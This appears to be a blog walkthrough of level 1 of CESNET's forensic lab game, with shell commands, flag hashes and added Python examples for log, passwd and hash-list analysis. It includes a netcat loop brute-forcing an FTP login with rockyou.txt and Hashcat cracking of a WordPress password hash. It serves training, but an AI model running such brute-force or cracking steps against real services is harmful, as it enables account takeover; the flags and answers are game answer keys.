Forensic Lab Game Zero - Level 1 Results

The goal of this post is to provide solutions for the first level of the game for "hackers" created by the forensic lab of the CESNET association. With this game CESNET introduces the work of forensic analysts and tests your knowledge of the Linux OS. There are several assignments and practical tasks included inside a Debian image which is available for download here. The question / answer sheet is located inside the home directory of the user kassad.

Picture 1 - Answer Sheet (screenshot flab-virtual-pc)

1. In the Linux image, which username is logged in automatically on boot?

Check the desktop environment.

kassad@debian1989:~$ echo $DESKTOP_SESSION
gnome-fallback

Check if automatic login is enabled for the GNOME desktop.

kassad@debian1989:~$ grep 'AutomaticLogin' /etc/gdm3/daemon.conf
AutomaticLoginEnable = true
AutomaticLogin = kassad

Automatic login is enabled for the user kassad. Now we need to compute the SHA-1 hash of the answer.

kassad@debian1989:~$ echo -n 'kassad' | sha1sum
fb1216c760d6c0996991108886d1797d8bd4ca27

2. On the provided Linux image, what is the "ls" command aliased to for the user from question 1?

kassad@debian1989:~$ type ls
ls is aliased to `ls --color=auto'

We can also get the result by checking the content of the file /home/kassad/.bashrc.

kassad@debian1989:~$ grep 'alias ls' /home/kassad/.bashrc
alias ls='ls --color=auto'

kassad@debian1989:~$ echo -n 'ls --color=auto' | sha1sum
b870e1ea6c6a5a9927698399ddf7a328a617b60b

3. Which of the following commands are built into the Bash shell? - cat, ls, echo, awk

kassad@debian1989:~$ type cat ls echo awk | grep builtin
echo is a shell builtin

kassad@debian1989:~$ echo -n echo | sha1sum
b2d21e771d9f86865c5eff193663574dd1796c8f

4. Which non-root user on the Linux image can execute /bin/bsd-csh?

Check the file permissions.

kassad@debian1989:~$ ls -l /bin/bsd-csh
-rwxr-x--- 1 root lamia 143144 Jul 18 2014 /bin/bsd-csh

Find out who is a member of the group lamia.

kassad@debian1989:~$ grep 'lamia' /etc/group
lamia:x:1001:

The group has no explicit members listed, so check which user has gid 1001 as the primary group; its uid is 1001 as well.

kassad@debian1989:~$ id 1001
uid=1001(lamia) gid=1001(lamia) groups=1001(lamia)

kassad@debian1989:~$ echo -n 'lamia' | sha1sum
6199c572a2fb4d26b437c850b1ffab359c74ee7d

5. Which command will open the manual page for nmap ?

kassad@debian1989:~$ echo -n 'man nmap' | sha1sum
8b0d7813c48ccef9d896082da2244c9ab851b465

6. There is an FTP service running on the provided Linux VM. Use the list of known weak passwords from one of the tools located in /opt/tools/ to recover the password for the account dure and retrieve the content of flag.txt from his home directory.

a) Extract the dictionary

kassad@debian1989:~$ cp /opt/tool/rockyou.txt.bz2 /home/kassad/
kassad@debian1989:~$ bzip2 -d rockyou.txt.bz2

b) FTP server bruteforce script

The script uses nc to connect to the FTP server on localhost with username dure and each password from the file rockyou.txt in turn. If the server answers with FTP reply code 230 (login successful), the password is printed and the loop ends.

kassad@debian1989:~$ while read -r lines; do echo "trying: $lines"; echo -e "USER dure\nPASS $lines\nQUIT" | nc localhost 21 | grep -q "^230" && echo "pass: $lines" && break; done < rockyou.txt

The password for user dure is a1b2c3.

c) Connect to FTP server and download file flag.txt

kassad@debian1989:~$ ftp -n localhost 21
ftp> user dure
Password:
230 Login successful.
ftp> mget flag.txt

kassad@debian1989:~$ cat flag.txt
da79c8dd34410073244ef8c85cf6da726f19d230

kassad@debian1989:~$ echo -n 'da79c8dd34410073244ef8c85cf6da726f19d230' | sha1sum
0087361acf5d7b79698c5e80619bfc31a9e482c8

7. A backup of a WordPress database is located in your home directory. Recover the plaintext password for the admin account. For offline cracking, long dictionaries are typically used.

a) Locate hash
The following line in the file wordpress.sample.sql contains the hash for the user admin.

INSERT INTO `wp_users` VALUES (1,'admin','$P$BKNIHw43WhqEgh/1jjRa1pMnDMIlbT0','admin','admin@localhost.loc','','2013-03-27 16:30:57','',0,'admin');

The hash is: $P$BKNIHw43WhqEgh/1jjRa1pMnDMIlbT0

b) Identify hash

An online hash identifier reports that the hash may be one of the following:

- phpass, MD5(WordPress), MD5(phpBB3)

c) Install Hashcat

I have installed Hashcat on the host computer to speed up the hash-cracking process.

$ wget https://hashcat.net/files_legacy/hashcat-2.00.7z
$ mkdir hashcat
$ mv hashcat-2.00.7z hashcat
$ cd hashcat/
$ 7z e hashcat-2.00.7z

d) Crack hash with Hashcat

$ ./hashcat-cli64.bin -m 400 /home/brezular/Downloads/forenzna/hash.txt /home/brezular/Downloads/forenzna/rockyou.txt
$P$BKNIHw43WhqEgh/1jjRa1pMnDMIlbT0:budakbageur

Password for user admin is budakbageur.

$ echo -n 'budakbageur' | sha1sum
3a2ba7a9f619789219bc0eced636433b526441f6
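To show what hashcat mode 400 is actually recomputing for every guess, here is an added Python implementation of the phpass scheme; it is not code from the post and not WordPress's own code. The character after $P$ encodes the iteration count, the next eight characters are the salt, and the remaining 22 characters are the MD5 result after 2^count_log2 rounds of stretching, written in phpass's private base-64 alphabet. The salt Babcdefgh and the demo password below are constructed values; phpass_verify is the check a WordPress login performs against the stored hash.

```python
import hashlib
import hmac

# phpass alphabet; the position of a character encodes count_log2 in the hash prefix.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def encode64(data, count):
    """phpass's private base-64 variant (3 bytes -> 4 chars, low bits first)."""
    out = ""
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out += ITOA64[value & 0x3F]
        if i < count:
            value |= data[i] << 8
        out += ITOA64[(value >> 6) & 0x3F]
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out += ITOA64[(value >> 12) & 0x3F]
        if i >= count:
            break
        i += 1
        out += ITOA64[(value >> 18) & 0x3F]
    return out


def parse_setting(setting):
    """Return (iterations, salt) from the first 12 chars of a $P$/$H$ hash, or None."""
    if len(setting) < 12 or setting[:3] not in ("$P$", "$H$"):
        return None
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        return None
    return 1 << count_log2, setting[4:12]


def phpass_hash(password, setting):
    """Recompute the phpass hash of password under the salt and count in setting."""
    parsed = parse_setting(setting)
    if parsed is None:
        return None
    iterations, salt = parsed
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    # Key stretching: 2^count_log2 further rounds of md5(previous digest || password).
    for _ in range(iterations):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + encode64(digest, 16)


def phpass_verify(password, stored_hash):
    """Login-side check: recompute and compare in constant time."""
    candidate = phpass_hash(password, stored_hash)
    return candidate is not None and hmac.compare_digest(candidate, stored_hash)


if __name__ == "__main__":
    # Constructed demo values: "Babcdefgh" is a made-up salt with count_log2 = 13 (8192 rounds).
    demo = phpass_hash("correct horse battery", "$P$Babcdefgh")
    print(demo, phpass_verify("correct horse battery", demo))
```

Parsing the prefix of the hash from the dump gives count_log2 = 13, i.e. 8192 MD5 rounds per candidate password. That stretching is what makes a dictionary run against phpass slower than against raw MD5, and it is the reason the exercise sends you to an offline cracker with a long wordlist rather than guessing against the live site.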

8. There are two text files in the /home/kassad directory, system_hashes_baseline and system_hashes_incident0. Using that information, find the file that was probably added during the security incident. Use the SHA-1 of the file as the answer.

a) Count the lines in both files

kassad@debian1989:~$ wc -l system_hashes_incident0.txt system_hashes_baseline.txt
313 system_hashes_incident0.txt
312 system_hashes_baseline.txt
625 total

Now we know that the file system_hashes_incident0.txt contains one more hash than the original system_hashes_baseline.txt. All we need to do is to compare every line of system_hashes_incident0.txt with the content of the original file. If a hash is not found in the baseline, we have our answer.

kassad@debian1989:~$ while read -r line; do hash1=$(echo "$line" | cut -d " " -f1); grep -qF "$hash1" system_hashes_baseline.txt || echo "$line"; done < /home/kassad/system_hashes_incident0.txt

7ff56d9d0b8c4fc0a1a62e452ba93b43b30ce483 /bin/netcat.real

The file /bin/netcat.real was added by attacker.

kassad@debian1989:~$ echo -n '7ff56d9d0b8c4fc0a1a62e452ba93b43b30ce483' | sha1sum
739d4694ef6f9272b40bea5ac3c7aa355f6d1a12
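The loop above keys on the digest alone, so it finds a file whose hash is new, but it would miss a copy of an existing binary dropped under a new path (same digest, different name) and it never reports files that disappeared. Here is an added Python version, not part of the original post, that parses sha1sum-style lists into path-keyed dictionaries and reports added, removed and modified paths; hash_only_diff reproduces the post's digest-only view for comparison. The sample lists and their 40-character digests are constructed, not the VM's real files.

```python
# Both lists use the sha1sum output layout: "<40-hex-digest>  <path>".


def parse_hash_list(text):
    """Parse sha1sum-style lines into {path: digest}; malformed lines raise instead of being skipped."""
    entries = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 40:
            raise ValueError(f"line {lineno}: not a sha1sum record: {line!r}")
        digest, path = parts
        # sha1sum prefixes '*' to the path in binary mode; strip it so paths compare cleanly.
        entries[path.lstrip("*")] = digest.lower()
    return entries


def compare_hash_lists(baseline, incident):
    """Path-keyed comparison: what appeared, what vanished, what changed in place."""
    return {
        "added": sorted(p for p in incident if p not in baseline),
        "removed": sorted(p for p in baseline if p not in incident),
        "modified": sorted(p for p in incident if p in baseline and incident[p] != baseline[p]),
    }


def hash_only_diff(baseline, incident):
    """The post's approach: incident entries whose digest is absent from the baseline."""
    known = set(baseline.values())
    return sorted(p for p, d in incident.items() if d not in known)


def _fake(c):
    return c * 40  # constructed placeholder digest, not a real file hash


# Constructed sample lists standing in for system_hashes_baseline.txt / system_hashes_incident0.txt.
SAMPLE_BASELINE = "\n".join([
    f"{_fake('a')}  /bin/ls",
    f"{_fake('b')}  /bin/netcat",
    f"{_fake('c')}  /etc/passwd",
    f"{_fake('d')}  /usr/bin/vim",
])
SAMPLE_INCIDENT = "\n".join([
    f"{_fake('a')}  /bin/ls",
    f"{_fake('b')}  /bin/netcat",
    f"{_fake('e')}  /bin/netcat.real",  # new path, new digest
    f"{_fake('f')}  /etc/passwd",       # same path, digest changed
    f"{_fake('b')}  /tmp/nc-copy",      # new path, but digest already in the baseline
])

if __name__ == "__main__":
    base = parse_hash_list(SAMPLE_BASELINE)
    inc = parse_hash_list(SAMPLE_INCIDENT)
    for kind, paths in compare_hash_lists(base, inc).items():
        print(f"{kind}: {paths}")
    print("digest-only view:", hash_only_diff(base, inc))
```

On the sample data the digest-only view reports /bin/netcat.real and /etc/passwd but stays silent on /tmp/nc-copy and on the removed /usr/bin/vim; the path-keyed comparison reports all four, split by kind.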

9. Find the most active attacker in the given log file /home/kassad/auth.log.

kassad@debian1989:~$ grep -o -w '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' auth.log | sort | uniq -c | sort -bgr

57 84.45.123.3

The most active attacker has IP address 84.45.123.3.

kassad@debian1989:~$ echo -n '84.45.123.3' | sha1sum
a774905567b7200116dac0b82ccd1da893d99588
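The grep pipeline counts every IPv4 address in auth.log, so accepted logins, CRON lines and anything else carrying an address are mixed into the tally. As an added example (not from the post), the Python below counts only sshd failed-password lines per source address, keeps the usernames each source tried, and flags sources that eventually succeeded after failing. The log lines are constructed in Debian's auth.log layout with documentation-range addresses, and the regexes are assumptions about the sshd message wording.

```python
import re
from collections import Counter, defaultdict

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from " + IPV4)
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from " + IPV4)


def summarize_auth_log(lines):
    """Count failed sshd logins per source IP; remember usernames tried and accepted logins."""
    failed = Counter()
    users_tried = defaultdict(set)
    accepted = defaultdict(set)
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            failed[ip] += 1
            users_tried[ip].add(user)
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            user, ip = m.groups()
            accepted[ip].add(user)
    return {"failed": failed, "users_tried": users_tried, "accepted": accepted}


def most_active_attacker(summary):
    """(ip, failed_count) with the most failures, or None when nothing failed."""
    top = summary["failed"].most_common(1)
    return top[0] if top else None


def successful_after_failures(summary):
    """Sources that logged in after failing first: the entries worth a closer look."""
    return sorted(ip for ip in summary["accepted"] if summary["failed"][ip] > 0)


# Constructed sample lines in Debian auth.log layout; addresses are documentation ranges.
SAMPLE_AUTH_LOG = [
    "Mar  9 10:01:02 debian1989 sshd[2201]: Failed password for invalid user admin from 203.0.113.3 port 40110 ssh2",
    "Mar  9 10:01:05 debian1989 sshd[2201]: Failed password for invalid user admin from 203.0.113.3 port 40110 ssh2",
    "Mar  9 10:01:09 debian1989 sshd[2203]: Failed password for root from 203.0.113.3 port 40112 ssh2",
    "Mar  9 10:02:00 debian1989 sshd[2210]: Accepted password for kassad from 192.0.2.5 port 51000 ssh2",
    "Mar  9 10:03:11 debian1989 sshd[2215]: Failed password for dure from 198.51.100.7 port 42000 ssh2",
    "Mar  9 10:03:20 debian1989 sshd[2215]: Accepted password for dure from 198.51.100.7 port 42000 ssh2",
    "Mar  9 10:04:00 debian1989 CRON[2220]: pam_unix(cron:session): session opened for user root by (uid=0)",
]

if __name__ == "__main__":
    s = summarize_auth_log(SAMPLE_AUTH_LOG)
    print("most active:", most_active_attacker(s))
    print("succeeded after failures:", successful_after_failures(s))
    for ip, users in s["users_tried"].items():
        print(ip, "tried", sorted(users))
```

Run against the real file with summarize_auth_log(open("/home/kassad/auth.log")). Unlike the raw address count, the failure-only tally leaves the legitimate kassad login out entirely, and the second function singles out 198.51.100.7, which failed once and then got in.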

10. What type of file is /home/kassad/somefile - disk image, zip file, text file, HTML page

kassad@debian1989:~$ file /home/kassad/somefile
somefile: DOS/MBR boot sector, code offset 0x3e+2, OEM-ID "MSWIN4.0", root entries 224, sectors 2880 (volumes <=32 MB) , sectors/FAT 9, sectors/track 18, serial number 0x350518e3, label: "BOOT95A ", FAT (12 bit), followed by FAT

kassad@debian1989:~$ echo -n 'disk image' | sha1sum
19d43c36d41667b1b63e1220cfc8498605f9ffcc -

11. Mount the drive image located in your home directory and retrieve the content of flag.txt stored inside. The administrator of the virtual machine has already given you permission to run the mount and umount commands as root.

kassad@debian1989:~$ mkdir mount
kassad@debian1989:~$ sudo mount -t vfat somefile mount/

kassad@debian1989:~$ cat /home/kassad/mount/flag.txt
75df0cfbc5757721f18f3ab1b3b0603ff0c1644f

kassad@debian1989:~$ echo -n '75df0cfbc5757721f18f3ab1b3b0603ff0c1644f' | sha1sum
eaf5a724482071ce1c6093d59c860794f6ddc3e6

12. There is another file hidden inside the provided disk image; find it and retrieve the flag from its metadata.

kassad@debian1989:~$ exiftool -r /home/kassad/mount/.hype.jpg | grep Comment | cut -d ":" -f2
548f59ce9ad3b8d0ce477ff51a0eddbad474022e

kassad@debian1989:~$ echo -n '548f59ce9ad3b8d0ce477ff51a0eddbad474022e' | sha1sum
1966dd5809116e4db1bbe7cd06e60808c9252ccd

13. Which of the users of the provided VM is equivalent to root from the Linux perspective?

kassad@debian1989:~$ cat /etc/passwd | grep -w '0'
root:x:0:0:root:/root:/bin/bash
simmons:x:0:1002:,,,:/home/simmons:/bin/bash

User simmons has UID 0, so he has root privileges.

kassad@debian1989:~$ echo -n simmons | sha1sum
cabbd2045c248eb63d96d785badf13e001e7b5c6
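grep -w '0' matches any whole-word 0 on the line (a GID of 0, or a 0 inside the GECOS field), not only the UID. As an added example that is not part of the post, the following Python parses /etc/passwd field by field and reports every UID-0 account other than root, plus shared UIDs and duplicate names, the checks a reviewer of a compromised box actually wants. The sample file is constructed: only the root and simmons lines come from the post; the other entries, including ops with GID 0, are made up to show where the grep over-matches.

```python
PASSWD_FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Parse /etc/passwd text into a list of dicts; uid/gid become ints, bad lines raise."""
    accounts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields: {line!r}")
        account = dict(zip(PASSWD_FIELDS, fields))
        account["uid"] = int(account["uid"])
        account["gid"] = int(account["gid"])
        accounts.append(account)
    return accounts


def uid0_accounts(accounts):
    """Every account whose UID is 0, i.e. root-equivalent whatever its name."""
    return [a["name"] for a in accounts if a["uid"] == 0]


def audit_passwd(accounts):
    """Findings a reviewer would flag: extra UID-0 users, shared UIDs, duplicate names."""
    findings = []
    for name in uid0_accounts(accounts):
        if name != "root":
            findings.append(f"{name}: UID 0 but not root (root-equivalent account)")
    by_uid = {}
    for a in accounts:
        by_uid.setdefault(a["uid"], []).append(a["name"])
    for uid, names in sorted(by_uid.items()):
        if len(names) > 1 and uid != 0:  # UID 0 is already reported above
            findings.append(f"uid {uid} shared by {', '.join(names)}")
    seen = set()
    for a in accounts:
        if a["name"] in seen:
            findings.append(f"{a['name']}: duplicate entry")
        seen.add(a["name"])
    return findings


def lines_with_a_zero_field(text):
    """Approximates what `grep -w '0' /etc/passwd` matches: any field equal to 0."""
    return [line.split(":")[0] for line in text.splitlines() if "0" in line.split(":")]


# Constructed passwd excerpt: root and simmons are the UID-0 lines from the post;
# daemon, kassad, lamia and ops are made up. ops has GID 0 but UID 1003.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kassad:x:1000:1000:kassad,,,:/home/kassad:/bin/bash
lamia:x:1001:1001::/home/lamia:/bin/bash
simmons:x:0:1002:,,,:/home/simmons:/bin/bash
ops:x:1003:0:ops,,,:/home/ops:/bin/bash
"""

if __name__ == "__main__":
    accounts = parse_passwd(SAMPLE_PASSWD)
    print("UID 0:", uid0_accounts(accounts))
    print("grep -w 0 would match:", lines_with_a_zero_field(SAMPLE_PASSWD))
    for finding in audit_passwd(accounts):
        print("finding:", finding)
```

On the sample the grep approximation matches root, simmons and ops, while the parsed view correctly lists only root and simmons as UID 0 and produces a single finding for simmons. Point parse_passwd at open("/etc/passwd").read() to run it on a real system.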

14. User kassad can run several programs using sudo. Based on the commands available, find and retrieve the flag.

kassad@debian1989:~$ sudo -l -U kassad

User kassad may run the following commands on debian1989:
(root) NOPASSWD: /bin/mount, /bin/umount
(lamia) NOPASSWD: /usr/bin/get_a_flag

kassad@debian1989:~$ sudo -u lamia /usr/bin/get_a_flag
Here is your flag lamia: 87df8cb351dc718369ae900297bafbb33fffa28e

kassad@debian1989:~$ echo -n '87df8cb351dc718369ae900297bafbb33fffa28e' | sha1sum
6076243406b4cd05b9dc7fcfaaab7fcea8438c5e

15. Find the flag set in the kernel's command-line arguments.

kassad@debian1989:~$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-3.16.0-4-amd64 root=UUID=d6afdc70-c685-4545-a442-bffa3c4a0170 ro quiet 49c11fb5e18585445a5d121b35a4ea138c327489

kassad@debian1989:~$ echo -n '49c11fb5e18585445a5d121b35a4ea138c327489' | sha1sum
ea557ae465386d60e2c46273b8d8abafad01972a

End of level 1.
